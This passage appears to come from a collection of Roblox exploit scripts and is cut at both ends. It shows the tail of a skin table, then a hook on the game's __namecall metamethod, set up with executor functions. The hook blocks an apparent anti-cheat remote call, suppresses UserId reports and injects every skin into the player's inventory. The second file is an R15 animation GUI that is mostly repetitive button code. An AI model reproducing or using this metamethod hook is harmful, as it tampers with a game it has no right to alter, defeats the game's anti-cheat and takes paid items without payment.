{'M4A4_Jester'}, 364 | {'M4A4_King'}, 365 | {'M4A4_Mistletoe'}, 366 | {'M4A4_Pinkie'}, 367 | {'M4A4_Pinkvision'}, 368 | {'M4A4_Pondside'}, 369 | {'M4A4_Precision'}, 370 | {'M4A4_Quicktime'}, 371 | {'M4A4_Racer'}, 372 | {'M4A4_RayTrack'}, 373 | {'M4A4_Scapter'}, 374 | {'M4A4_Stardust'}, 375 | {'M4A4_Toy Soldier'}, 376 | {'MAC10_Artists Intent'}, 377 | {'MAC10_Blaze'}, 378 | {'MAC10_Golden Rings'}, 379 | {'MAC10_Pimpin'}, 380 | {'MAC10_Skeleboney'}, 381 | {'MAC10_Toxic'}, 382 | {'MAC10_Turbo'}, 383 | {'MAC10_Wetland'}, 384 | {'MAG7_Bombshell'}, 385 | {'MAG7_C4UTION'}, 386 | {'MAG7_Frosty'}, 387 | {'MAG7_Molten'}, 388 | {'MAG7_Outbreak'}, 389 | {'MAG7_Striped'}, 390 | {'MP7_Calaxian'}, 391 | {'MP7_Cogged'}, 392 | {'MP7_Goo'}, 393 | {'MP7_Holiday'}, 394 | {'MP7_Industrial'}, 395 | {'MP7_Reindeer'}, 396 | {'MP7_Silent Ops'}, 397 | {'MP7_Sunshot'}, 398 | {'MP9_Blueroyal'}, 399 | {'MP9_Cob Web'}, 400 | {'MP9_Cookie Man'}, 401 | {'MP9_Decked Halls'}, 402 | {'MP9_SnowTime'}, 403 | {'MP9_Vaporwave'}, 404 | {'MP9_Velvita'}, 405 | {'MP9_Wilderness'}, 406 | {'Negev_Default'}, 407 | {'Negev_Midnightbones'}, 408 | {'Negev_Quazar'}, 409 | {'Negev_Striped'}, 410 | {'Negev_Wetland'}, 411 | {'Negev_Winterfell'}, 412 | {'Nova_Black Ice'}, 413 | {'Nova_Cookie'}, 414 | {'Nova_Paradise'}, 415 | {'Nova_Sharkesh'}, 416 | {'Nova_Starry Night'}, 417 | {'Nova_Terraformer'}, 418 | {'Nova_Tiger'}, 419 | {'P2000_Apathy'}, 420 | {'P2000_Camo Dipped'}, 421 | {'P2000_Candycorn'}, 422 | {'P2000_Comet'}, 423 | {'P2000_Dark Beast'}, 424 | {'P2000_Golden Age'}, 425 | {'P2000_Lunar'}, 426 | {'P2000_Pinkie'}, 427 | {'P2000_Ruby'}, 428 | {'P2000_Silence'}, 429 | {'P250_Amber'}, 430 | {'P250_Bomber'}, 431 | {'P250_Equinox'}, 432 | {'P250_Frosted'}, 433 | {'P250_Goldish'}, 434 | {'P250_Green Web'}, 435 | {'P250_Shark'}, 436 | {'P250_Solstice'}, 437 | {'P250_TC250'}, 438 | {'P90_Demon Within'}, 439 | {'P90_Elegant'}, 440 | {'P90_Krampus'}, 441 | {'P90_Northern Lights'}, 442 | {'P90_P-Chan'}, 443 | {'P90_Pine'}, 444 | {'P90_Redcopy'}, 445 | {'P90_Skulls'}, 446 | {'R8_Exquisite'}, 447 | {'R8_Hunter'}, 448 | {'R8_Spades'}, 449 | {'R8_TG'}, 450 | {'R8_Violet'}, 451 | {'SG_DropX'}, 452 | {'SG_Dummy'}, 453 | {'SG_Kitty Cat'}, 454 | {'SG_Knighthood'}, 455 | {'SG_Magma'}, 456 | {'SG_Variant Camo'}, 457 | {'SG_Yltude'}, 458 | {'SawedOff_Casino'}, 459 | {'SawedOff_Colorboom'}, 460 | {'SawedOff_Executioner'}, 461 | {'SawedOff_Opal'}, 462 | {'SawedOff_Spooky'}, 463 | {'SawedOff_Sullys Blacklight'}, 464 | {'Scout_Coffin Biter'}, 465 | {'Scout_Flowing Mists'}, 466 | {'Scout_Hellborn'}, 467 | {'Scout_Hot Cocoa'}, 468 | {'Scout_Monstruo'}, 469 | {'Scout_Neon Regulation'}, 470 | {'Scout_Posh'}, 471 | {'Scout_Pulse'}, 472 | {'Scout_Railgun'}, 473 | {'Scout_Theory'}, 474 | {'Scout_Xmas'}, 475 | {'Sickle_Mummy'}, 476 | {'Sickle_Splattered'}, 477 | {'Tec9_Charger'}, 478 | {'Tec9_Gift Wrapped'}, 479 | {'Tec9_Ironline'}, 480 | {'Tec9_Performer'}, 481 | {'Tec9_Phol'}, 482 | {'Tec9_Samurai'}, 483 | {'Tec9_Skintech'}, 484 | {'Tec9_Stocking Stuffer'}, 485 | {'UMP_Death Grip'}, 486 | {'UMP_Gum Drop'}, 487 | {'UMP_Magma'}, 488 | {'UMP_Militia Camo'}, 489 | {'UMP_Molten'}, 490 | {'UMP_Redline'}, 491 | {'USP_Crimson'}, 492 | {'USP_Dizzy'}, 493 | {'USP_Frostbite'}, 494 | {'USP_Holiday'}, 495 | {'USP_Jade Dream'}, 496 | {'USP_Kraken'}, 497 | {'USP_Nighttown'}, 498 | {'USP_Paradise'}, 499 | {'USP_Racing'}, 500 | {'USP_Skull'}, 501 | {'USP_Unseen'}, 502 | {'USP_Worlds Away'}, 503 | {'USP_Yellowbelly'}, 504 | {'XM_Artic'}, 505 | {'XM_Atomic'}, 506 | {'XM_Campfire'}, 507 | {'XM_Endless Night'}, 508 | {'XM_MK11'}, 509 | {'XM_Predator'}, 510 | {'XM_Red'}, 511 | {'XM_Spectrum'}, 512 | {'Handwraps_Wraps'}, 513 | {'Sports Glove_Hazard'}, 514 | {'Sports Glove_Hallows'}, 515 | {'Sports Glove_Majesty'}, 516 | {'Strapped Glove_Racer'}, 517 | {'trapped Glove_Grim'}, 518 | {'trapped Glove_Wisk'}, 519 | {'Fingerless Glove_Scapter'}, 520 | {'Fingerless Glove_Digital'}, 521 | {'Fingerless Glove_Patch'}, 522 | {'Handwraps_Guts'}, 523 | {'Handwraps_Wetland'}, 524 | {'trapped Glove_Molten'}, 525 | {'Fingerless_Crystal'}, 526 | {'Sports Glove_Royal'}, 527 | {'Strapped Glove_Kringle'}, 528 | {'Handwraps_MMA'}, 529 | {'Sports Glove_Weeb'}, 530 | {'Sports Glove_CottonTail'}, 531 | {'Sports Glove_RSL'}, 532 | {'Handwraps_Ghoul Hex'}, 533 | {'Handwraps_Phantom Hex'}, 534 | {'Handwraps_Spector Hex'}, 535 | {'Handwraps_Orange Hex'}, 536 | {'Handwraps_Purple Hex'}, 537 | {'Handwraps_Green Hex'}, 538 | } 539 | 540 | local isUnlocked 541 | 542 | local mt = getrawmetatable(game) 543 | local oldNamecall = mt.__namecall 544 | setreadonly(mt, false) 545 | 546 | local isUnlocked 547 | 548 | mt.__namecall = newcclosure(function(self, ...) 549 | local args = {...} 550 | if getnamecallmethod() == "InvokeServer" and tostring(self) == "Hugh" then 551 | return 552 | end 553 | if getnamecallmethod() == "FireServer" then 554 | if args[1] == LocalPlayer.UserId then 555 | return 556 | end 557 | if string.len(tostring(self)) == 38 then 558 | if not isUnlocked then 559 | isUnlocked = true 560 | for i,v in pairs(allSkins) do 561 | local doSkip 562 | for i2,v2 in pairs(args[1]) do 563 | if v[1] == v2[1] then 564 | doSkip = true 565 | end 566 | end 567 | if not doSkip then 568 | table.insert(args[1], v) 569 | end 570 | end 571 | end 572 | return 573 | end 574 | if tostring(self) == "DataEvent" and args[1][4] then 575 | local currentSkin = string.split(args[1][4][1], "_")[2] 576 | if args[1][2] == "Both" then 577 | LocalPlayer["SkinFolder"]["CTFolder"][args[1][3]].Value = currentSkin 578 | LocalPlayer["SkinFolder"]["TFolder"][args[1][3]].Value = currentSkin 579 | else 580 | LocalPlayer["SkinFolder"][args[1][2] .. "Folder"][args[1][3]].Value = currentSkin 581 | end 582 | end 583 | end 584 | return oldNamecall(self, ...) 585 | end) 586 | 587 | setreadonly(mt, true) 588 | 589 | Client.CurrentInventory = allSkins 590 | 591 | local TClone, CTClone = LocalPlayer.SkinFolder.TFolder:Clone(), game.Players.LocalPlayer.SkinFolder.CTFolder:Clone() 592 | LocalPlayer.SkinFolder.TFolder:Destroy() 593 | LocalPlayer.SkinFolder.CTFolder:Destroy() 594 | TClone.Parent = LocalPlayer.SkinFolder 595 | CTClone.Parent = LocalPlayer.SkinFolder 596 | -------------------------------------------------------------------------------- /r15 animations: -------------------------------------------------------------------------------- 1 | -- Objects 2 | 3 | local ScreenGui = Instance.new("ScreenGui") 4 | local Main = Instance.new("Frame") 5 | local top = Instance.new("Frame") 6 | local close = Instance.new("TextButton") 7 | local menu = Instance.new("Frame") 8 | local TextLabel = Instance.new("TextLabel") 9 | local cheerdance = Instance.new("TextButton") 10 | local Guitar = Instance.new("TextButton") 11 | local Shake = Instance.new("TextButton") 12 | local insane = Instance.new("TextButton") 13 | local flingarms = Instance.new("TextButton") 14 | local rotate = Instance.new("TextButton") 15 | local bend = Instance.new("TextButton") 16 | local floatslash = Instance.new("TextButton") 17 | local quickjump = Instance.new("TextButton") 18 | local spin = Instance.new("TextButton") 19 | local fastspin = Instance.new("TextButton") 20 | local Swordswing = Instance.new("TextButton") 21 | local spinslice = Instance.new("TextButton") 22 | local airarms = Instance.new("TextButton") 23 | local detacharms = Instance.new("TextButton") 24 | local spear = Instance.new("TextButton") 25 | local armshake = Instance.new("TextButton") 26 | 27 | -- Properties 28 | 29 | ScreenGui.Parent = game.CoreGui 30 | 31 | Main.Name = "Main" 32 | Main.Parent = ScreenGui 33 | Main.Active = true 34 | Main.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) 35 | Main.ClipsDescendants = true 36 | Main.Draggable = true 37 | Main.Position = UDim2.new(0, 355, 0, 40) 38 | Main.Size = UDim2.new(0, 435, 0, 271) 39 | 40 | top.Name = "top" 41 | top.Parent = Main 42 | top.BackgroundColor3 = Color3.new(0.160784, 0.501961, 0.72549) 43 | top.BorderSizePixel = 0 44 | top.Size = UDim2.new(0, 435, 0, 20) 45 | 46 | close.Name = "close" 47 | close.Parent = top 48 | close.BackgroundColor3 = Color3.new(1, 1, 1) 49 | close.BackgroundTransparency = 1 50 | close.Position = UDim2.new(0, 410, 0, 0) 51 | close.Size = UDim2.new(0, 25, 0, 20) 52 | close.Font = Enum.Font.SourceSansSemibold 53 | close.Text = "X" 54 | close.TextColor3 = Color3.new(0.937255, 0.937255, 0.937255) 55 | close.TextSize = 25 56 | close.TextWrapped = true 57 | 58 | menu.Name = "menu" 59 | menu.Parent = Main 60 | menu.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) 61 | menu.BorderSizePixel = 0 62 | menu.Position = UDim2.new(0, 0, 0, 20) 63 | menu.Size = UDim2.new(0, 435, 0, 35) 64 | 65 | TextLabel.Parent = menu 66 | TextLabel.BackgroundColor3 = Color3.new(1, 1, 1) 67 | TextLabel.BackgroundTransparency = 1 68 | TextLabel.Size = UDim2.new(0, 435, 0, 35) 69 | TextLabel.Font = Enum.Font.SourceSansLight 70 | TextLabel.Text = "Super Animation [R15]" 71 | TextLabel.TextColor3 = Color3.new(0.933333, 0.933333, 0.933333) 72 | TextLabel.TextScaled = true 73 | TextLabel.TextSize = 14 74 | TextLabel.TextWrapped = true 75 | 76 | cheerdance.Name = "cheerdance" 77 | cheerdance.Parent = Main 78 | cheerdance.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 79 | cheerdance.BorderSizePixel = 0 80 | cheerdance.Position = UDim2.new(0, 10, 0, 65) 81 | cheerdance.Size = UDim2.new(0, 135, 0, 25) 82 | cheerdance.AutoButtonColor = false 83 | cheerdance.Font = Enum.Font.SourceSans 84 | cheerdance.Text = "Cheer Dance" 85 | cheerdance.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 86 | cheerdance.TextSize = 20 87 | cheerdance.TextWrapped = true 88 | 89 | Guitar.Name = "Guitar" 90 | Guitar.Parent = Main 91 | Guitar.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 92 | Guitar.BorderSizePixel = 0 93 | Guitar.Position = UDim2.new(0, 150, 0, 65) 94 | Guitar.Size = UDim2.new(0, 135, 0, 25) 95 | Guitar.AutoButtonColor = false 96 | Guitar.Font = Enum.Font.SourceSans 97 | Guitar.Text = "Guitar" 98 | Guitar.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 99 | Guitar.TextSize = 20 100 | Guitar.TextWrapped = true 101 | 102 | Shake.Name = "Shake" 103 | Shake.Parent = Main 104 | Shake.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 105 | Shake.BorderSizePixel = 0 106 | Shake.Position = UDim2.new(0, 290, 0, 65) 107 | Shake.Size = UDim2.new(0, 135, 0, 25) 108 | Shake.AutoButtonColor = false 109 | Shake.Font = Enum.Font.SourceSans 110 | Shake.Text = "Shake" 111 | Shake.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 112 | Shake.TextSize = 20 113 | Shake.TextWrapped = true 114 | 115 | insane.Name = "insane" 116 | insane.Parent = Main 117 | insane.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 118 | insane.BorderSizePixel = 0 119 | insane.Position = UDim2.new(0, 290, 0, 95) 120 | insane.Size = UDim2.new(0, 135, 0, 25) 121 | insane.AutoButtonColor = false 122 | insane.Font = Enum.Font.SourceSans 123 | insane.Text = "Insane" 124 | insane.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 125 | insane.TextSize = 20 126 | insane.TextWrapped = true 127 | 128 | flingarms.Name = "flingarms" 129 | flingarms.Parent = Main 130 | flingarms.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 131 | flingarms.BorderSizePixel = 0 132 | flingarms.Position = UDim2.new(0, 150, 0, 95) 133 | flingarms.Size = UDim2.new(0, 135, 0, 25) 134 | flingarms.AutoButtonColor = false 135 | flingarms.Font = Enum.Font.SourceSans 136 | flingarms.Text = "Fling Arms" 137 | flingarms.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 138 | flingarms.TextSize = 20 139 | flingarms.TextWrapped = true 140 | 141 | rotate.Name = "rotate" 142 | rotate.Parent = Main 143 | rotate.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 144 | rotate.BorderSizePixel = 0 145 | rotate.Position = UDim2.new(0, 10, 0, 95) 146 | rotate.Size = UDim2.new(0, 135, 0, 25) 147 | rotate.AutoButtonColor = false 148 | rotate.Font = Enum.Font.SourceSans 149 | rotate.Text = "Rotate" 150 | rotate.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 151 | rotate.TextSize = 20 152 | rotate.TextWrapped = true 153 | 154 | bend.Name = "bend" 155 | bend.Parent = Main 156 | bend.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 157 | bend.BorderSizePixel = 0 158 | bend.Position = UDim2.new(0, 10, 0, 125) 159 | bend.Size = UDim2.new(0, 135, 0, 25) 160 | bend.AutoButtonColor = false 161 | bend.Font = Enum.Font.SourceSans 162 | bend.Text = "Bend" 163 | bend.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 164 | bend.TextSize = 20 165 | bend.TextWrapped = true 166 | 167 | floatslash.Name = "floatslash" 168 | floatslash.Parent = Main 169 | floatslash.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 170 | floatslash.BorderSizePixel = 0 171 | floatslash.Position = UDim2.new(0, 150, 0, 125) 172 | floatslash.Size = UDim2.new(0, 135, 0, 25) 173 | floatslash.AutoButtonColor = false 174 | floatslash.Font = Enum.Font.SourceSans 175 | floatslash.Text = "Float Slash" 176 | floatslash.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 177 | floatslash.TextSize = 20 178 | floatslash.TextWrapped = true 179 | 180 | quickjump.Name = "quickjump" 181 | quickjump.Parent = Main 182 | quickjump.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 183 | quickjump.BorderSizePixel = 0 184 | quickjump.Position = UDim2.new(0, 290, 0, 125) 185 | quickjump.Size = UDim2.new(0, 135, 0, 25) 186 | quickjump.AutoButtonColor = false 187 | quickjump.Font = Enum.Font.SourceSans 188 | quickjump.Text = "Quick Jump" 189 | quickjump.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 190 | quickjump.TextSize = 20 191 | quickjump.TextWrapped = true 192 | 193 | spin.Name = "spin" 194 | spin.Parent = Main 195 | spin.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 196 | spin.BorderSizePixel = 0 197 | spin.Position = UDim2.new(0, 10, 0, 156) 198 | spin.Size = UDim2.new(0, 135, 0, 25) 199 | spin.AutoButtonColor = false 200 | spin.Font = Enum.Font.SourceSans 201 | spin.Text = "Spin" 202 | spin.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 203 | spin.TextSize = 20 204 | spin.TextWrapped = true 205 | 206 | fastspin.Name = "fastspin" 207 | fastspin.Parent = Main 208 | fastspin.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 209 | fastspin.BorderSizePixel = 0 210 | fastspin.Position = UDim2.new(0, 150, 0, 156) 211 | fastspin.Size = UDim2.new(0, 135, 0, 25) 212 | fastspin.AutoButtonColor = false 213 | fastspin.Font = Enum.Font.SourceSans 214 | fastspin.Text = "Fast Spin" 215 | fastspin.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 216 | fastspin.TextSize = 20 217 | fastspin.TextWrapped = true 218 | 219 | Swordswing.Name = "Swordswing" 220 | Swordswing.Parent = Main 221 | Swordswing.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 222 | Swordswing.BorderSizePixel = 0 223 | Swordswing.Position = UDim2.new(0, 290, 0, 156) 224 | Swordswing.Size = UDim2.new(0, 135, 0, 25) 225 | Swordswing.AutoButtonColor = false 226 | Swordswing.Font = Enum.Font.SourceSans 227 | Swordswing.Text = "Sword Swing" 228 | Swordswing.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 229 | Swordswing.TextSize = 20 230 | Swordswing.TextWrapped = true 231 | 232 | spinslice.Name = "spinslice" 233 | spinslice.Parent = Main 234 | spinslice.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 235 | spinslice.BorderSizePixel = 0 236 | spinslice.Position = UDim2.new(0, 150, 0, 186) 237 | spinslice.Size = UDim2.new(0, 135, 0, 25) 238 | spinslice.AutoButtonColor = false 239 | spinslice.Font = Enum.Font.SourceSans 240 | spinslice.Text = "Spin Slice" 241 | spinslice.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 242 | spinslice.TextSize = 20 243 | spinslice.TextWrapped = true 244 | 245 | airarms.Name = "airarms" 246 | airarms.Parent = Main 247 | airarms.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 248 | airarms.BorderSizePixel = 0 249 | airarms.Position = UDim2.new(0, 290, 0, 186) 250 | airarms.Size = UDim2.new(0, 135, 0, 25) 251 | airarms.AutoButtonColor = false 252 | airarms.Font = Enum.Font.SourceSans 253 | airarms.Text = "Air Arms" 254 | airarms.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 255 | airarms.TextSize = 20 256 | airarms.TextWrapped = true 257 | 258 | detacharms.Name = "detacharms" 259 | detacharms.Parent = Main 260 | detacharms.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 261 | detacharms.BorderSizePixel = 0 262 | detacharms.Position = UDim2.new(0, 10, 0, 186) 263 | detacharms.Size = UDim2.new(0, 135, 0, 25) 264 | detacharms.AutoButtonColor = false 265 | detacharms.Font = Enum.Font.SourceSans 266 | detacharms.Text = "Detach Arms" 267 | detacharms.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 268 | detacharms.TextSize = 20 269 | detacharms.TextWrapped = true 270 | 271 | spear.Name = "spear" 272 | spear.Parent = Main 273 | spear.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 274 | spear.BorderSizePixel = 0 275 | spear.Position = UDim2.new(0, 80, 0, 216) 276 | spear.Size = UDim2.new(0, 135, 0, 25) 277 | spear.AutoButtonColor = false 278 | spear.Font = Enum.Font.SourceSans 279 | spear.Text = "Spear" 280 | spear.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 281 | spear.TextSize = 20 282 | spear.TextWrapped = true 283 | 284 | armshake.Name = "armshake" 285 | armshake.Parent = Main 286 | armshake.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039) 287 | armshake.BorderSizePixel = 0 288 | armshake.Position = UDim2.new(0, 220, 0, 216) 289 | armshake.Size = UDim2.new(0, 135, 0, 25) 290 | armshake.AutoButtonColor = false 291 | armshake.Font = Enum.Font.SourceSans 292 | armshake.Text = "Arm Shake" 293 | armshake.TextColor3 = Color3.new(0.901961, 0.901961, 0.901961) 294 | armshake.TextSize = 20 295 | armshake.TextWrapped = true 296 | 297 | -- Scripts 298 | 299 | close.MouseButton1Click:connect(function() 300 | if Main.Size == UDim2.new(0, 435, 0, 271) then 301 | Main.Size = UDim2.new(0, 435, 0, 55) 302 | else 303 | Main.Size = UDim2.new(0, 435, 0, 271) 304 | end 305 | end) 306 | c = Color3.new(0.298039, 0.298039, 0.298039) 307 | l = Color3.new(0.498039, 0.498039, 0.498039) 308 | local Anim = Instance.new("Animation") 309 | Anim.AnimationId = "rbxassetid://1029253339" 310 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 311 | local cheerdanceactive = false 312 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 313 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 314 | cheerdanceactive = false 315 | cheerdance.BackgroundColor3 = c 316 | end) 317 | cheerdance.MouseButton1Click:connect(function() 318 | cheerdanceactive = not cheerdanceactive 319 | if cheerdanceactive then 320 | cheerdance.BackgroundColor3 = l 321 | while wait() do 322 | if track.IsPlaying == false then 323 | if cheerdanceactive then 324 | track:Play(.1, 1, 1) 325 | end 326 | end 327 | end 328 | else 329 | track:Stop() 330 | cheerdance.BackgroundColor3 = c 331 | end 332 | end) 333 | local Anim = Instance.new("Animation") 334 | Anim.AnimationId = "rbxassetid://1119819044" 335 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 336 | local Guitaractive = false 337 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 338 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 339 | Guitaractive = false 340 | Guitar.BackgroundColor3 = c 341 | end) 342 | Guitar.MouseButton1Click:connect(function() 343 | Guitaractive = not Guitaractive 344 | if Guitaractive then 345 | Guitar.BackgroundColor3 = l 346 | while wait() do 347 | if track.IsPlaying == false then 348 | if Guitaractive then 349 | track:Play(.1, 1, 1) 350 | end 351 | end 352 | end 353 | else 354 | track:Stop() 355 | Guitar.BackgroundColor3 = c 356 | end 357 | end) 358 | local Anim = Instance.new("Animation") 359 | Anim.AnimationId = "rbxassetid://857149191" 360 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 361 | local Shakeactive = false 362 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 363 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 364 | Shakeactive = false 365 | Shake.BackgroundColor3 = c 366 | end) 367 | Shake.MouseButton1Click:connect(function() 368 | Shakeactive = not Shakeactive 369 | if Shakeactive then 370 | Shake.BackgroundColor3 = l 371 | while wait() do 372 | if track.IsPlaying == false then 373 | if Shakeactive then 374 | track:Play(.1, 1, 1) 375 | end 376 | end 377 | end 378 | else 379 | track:Stop() 380 | Shake.BackgroundColor3 = c 381 | end 382 | end) 383 | local Anim = Instance.new("Animation") 384 | Anim.AnimationId = "rbxassetid://1029253339" 385 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 386 | local insaneactive = false 387 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 388 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 389 | insaneactive = false 390 | insane.BackgroundColor3 = c 391 | end) 392 | insane.MouseButton1Click:connect(function() 393 | insaneactive = not insaneactive 394 | if insaneactive then 395 | insane.BackgroundColor3 = l 396 | while wait() do 397 | if track.IsPlaying == false then 398 | if insaneactive then 399 | track:Play(.1, 1, 50) 400 | end 401 | end 402 | end 403 | else 404 | track:Stop() 405 | insane.BackgroundColor3 = c 406 | end 407 | end) 408 | local Anim = Instance.new("Animation") 409 | Anim.AnimationId = "rbxassetid://754656200" 410 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 411 | local flingarmsactive = false 412 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 413 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 414 | flingarmsactive = false 415 | flingarms.BackgroundColor3 = c 416 | end) 417 | flingarms.MouseButton1Click:connect(function() 418 | flingarmsactive = not flingarmsactive 419 | if flingarmsactive then 420 | flingarms.BackgroundColor3 = l 421 | while wait() do 422 | if track.IsPlaying == false then 423 | if flingarmsactive then 424 | track:Play(.1, 1, 10) 425 | end 426 | end 427 | end 428 | else 429 | track:Stop() 430 | flingarms.BackgroundColor3 = c 431 | end 432 | end) 433 | local Anim = Instance.new("Animation") 434 | Anim.AnimationId = "rbxassetid://675025570" 435 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 436 | local rotateactive = false 437 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 438 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 439 | rotateactive = false 440 | rotate.BackgroundColor3 = c 441 | end) 442 | rotate.MouseButton1Click:connect(function() 443 | rotateactive = not rotateactive 444 | if rotateactive then 445 | rotate.BackgroundColor3 = l 446 | while wait() do 447 | if track.IsPlaying == false then 448 | if rotateactive then 449 | track:Play(.1, 1, 1) 450 | end 451 | end 452 | end 453 | else 454 | track:Stop() 455 | rotate.BackgroundColor3 = c 456 | end 457 | end) 458 | local Anim = Instance.new("Animation") 459 | Anim.AnimationId = "rbxassetid://696096087" 460 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 461 | local bendactive = false 462 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 463 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 464 | bendactive = false 465 | bend.BackgroundColor3 = c 466 | end) 467 | bend.MouseButton1Click:connect(function() 468 | bendactive = not bendactive 469 | if bendactive then 470 | bend.BackgroundColor3 = l 471 | while wait() do 472 | if track.IsPlaying == false then 473 | if bendactive then 474 | track:Play(.1, 1, 1) 475 | end 476 | end 477 | end 478 | else 479 | track:Stop() 480 | bend.BackgroundColor3 = c 481 | end 482 | end) 483 | local Anim = Instance.new("Animation") 484 | Anim.AnimationId = "rbxassetid://717879555" 485 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 486 | local floatslashactive = false 487 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 488 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 489 | floatslashactive = false 490 | floatslash.BackgroundColor3 = c 491 | end) 492 | floatslash.MouseButton1Click:connect(function() 493 | floatslashactive = not floatslashactive 494 | if floatslashactive then 495 | floatslash.BackgroundColor3 = l 496 | while wait() do 497 | if track.IsPlaying == false then 498 | if floatslashactive then 499 | track:Play(.1, 1, 1) 500 | end 501 | end 502 | end 503 | else 504 | track:Stop() 505 | floatslash.BackgroundColor3 = c 506 | end 507 | end) 508 | local Anim = Instance.new("Animation") 509 | Anim.AnimationId = "rbxassetid://717879555" 510 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 511 | local quickjumpactive = false 512 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 513 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 514 | quickjumpactive = false 515 | quickjump.BackgroundColor3 = c 516 | end) 517 | quickjump.MouseButton1Click:connect(function() 518 | quickjumpactive = not quickjumpactive 519 | if quickjumpactive then 520 | quickjump.BackgroundColor3 = l 521 | while wait() do 522 | if track.IsPlaying == false then 523 | if quickjumpactive then 524 | track:Play(.1, 1, 7) 525 | end 526 | end 527 | end 528 | else 529 | track:Stop() 530 | quickjump.BackgroundColor3 = c 531 | end 532 | end) 533 | local Anim = Instance.new("Animation") 534 | Anim.AnimationId = "rbxassetid://754658275" 535 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 536 | local spinactive = false 537 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 538 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 539 | spinactive = false 540 | spin.BackgroundColor3 = c 541 | end) 542 | spin.MouseButton1Click:connect(function() 543 | spinactive = not spinactive 544 | if spinactive then 545 | spin.BackgroundColor3 = l 546 | while wait() do 547 | if track.IsPlaying == false then 548 | if spinactive then 549 | track:Play(.1, 1, 1) 550 | end 551 | end 552 | end 553 | else 554 | track:Stop() 555 | spin.BackgroundColor3 = c 556 | end 557 | end) 558 | local Anim = Instance.new("Animation") 559 | Anim.AnimationId = "rbxassetid://754658275" 560 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 561 | local fastspinactive = false 562 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 563 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 564 | fastspinactive = false 565 | fastspin.BackgroundColor3 = c 566 | end) 567 | fastspin.MouseButton1Click:connect(function() 568 | fastspinactive = not fastspinactive 569 | if fastspinactive then 570 | fastspin.BackgroundColor3 = l 571 | while wait() do 572 | if track.IsPlaying == false then 573 | if fastspinactive then 574 | track:Play(.1, 1, 10) 575 | end 576 | end 577 | end 578 | else 579 | track:Stop() 580 | fastspin.BackgroundColor3 = c 581 | end 582 | end) 583 | local Anim = Instance.new("Animation") 584 | Anim.AnimationId = "rbxassetid://846754447" 585 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 586 | local Swordswingactive = false 587 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 588 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 589 | Swordswingactive = false 590 | 